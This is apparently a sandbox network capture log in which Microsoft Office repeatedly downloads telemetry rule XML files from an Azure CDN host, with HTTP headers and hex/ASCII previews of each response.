                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1352
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                        x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bdkw94lhC1EWRxuz400000003gg000000005zek
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        128192.168.2.54993613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:01 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1405
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                        x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bdjzh7thC1EWR3g6400000003a000000000hqwb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        129192.168.2.54993713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:01 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1368
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                        x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bd9x4mhhC1EWRb76n000000037g00000000w1eh
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        130192.168.2.54993813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:01 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE055B528"
                                                                                        x-ms-request-id: 44bf79b1-501e-0078-809b-4606cf000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bd9x4mhhC1EWRb76n00000003b000000000dfc6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        131192.168.2.54993913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:01 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:02 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE1223606"
                                                                                        x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bdkw94lhC1EWRxuz400000003h0000000003qxy
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:02 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        132192.168.2.54994213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:03 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:03 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                        x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215103Z-1746fd949bd77mkmhC1EWR5efc00000003mg000000007bzp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        133192.168.2.54994313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:03 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:03 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                        x-ms-request-id: ca94536e-f01e-003c-2599-468cf0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215103Z-1746fd949bdkw94lhC1EWRxuz400000003b000000000y8p1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        134192.168.2.54994413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:03 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                        x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bd77mkmhC1EWR5efc00000003hg00000000gf37
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        135192.168.2.54994113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:04 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                        ETag: "0x8DC582BE7262739"
                                                                                        x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bdlnsqphC1EWRurw0000000033g00000000kse6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        136192.168.2.54994613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:05 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                        x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215105Z-1746fd949bdb8xvchC1EWRmbd4000000037g00000000emvp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        137192.168.2.54994713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:51:05 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                        x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215105Z-1746fd949bd4w8sthC1EWR7004000000031g00000000e8z1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
